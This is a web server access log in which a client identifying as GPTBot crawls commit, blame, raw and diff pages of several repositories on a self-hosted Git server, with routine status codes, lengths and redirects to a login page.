"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:15:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15612] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:15:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11624] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" +[17/Feb/2026:15:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets%2fimages" [Client 74.7.227.38] [Length 23999] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" +[17/Feb/2026:15:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12097] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:15:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10942] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:15:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10944] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:15:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16081] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16083] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2ffetcher.py.claude" [Client 74.7.227.38] [Length 28690] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:15:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fpython" [Client 74.7.227.38] [Length 23591] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 12747] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:15:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21832] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24008] [Gzip 15.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 1658] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:15:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:15:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2factivate" [Client 74.7.227.38] [Length 26068] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:15:08:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:15:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.vscode" +[17/Feb/2026:15:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2ffallback_error.log" [Client 74.7.227.38] [Length 21151] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2ffallback_error.log" [Client 74.7.227.38] [Length 19367] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:15:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fassets" [Client 74.7.227.38] [Length 28013] [Gzip 5.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" +[17/Feb/2026:15:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2f.gitignore" [Client 74.7.227.38] [Length 23303] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:15:08:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:15:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8478] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fservices%2fgeminiService.ts" [Client 74.7.227.38] [Length 25002] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:15:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15806] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14314] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20904] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 18120] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" +[17/Feb/2026:15:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" +[17/Feb/2026:15:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" +[17/Feb/2026:15:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" +[17/Feb/2026:15:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 30198] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:15:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 22972] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:15:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.patch" [Client 74.7.227.38] [Length 1639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:15:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.patch" [Client 74.7.227.38] [Length 32801] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:15:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3.diff" [Client 74.7.227.38] [Length 32145] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 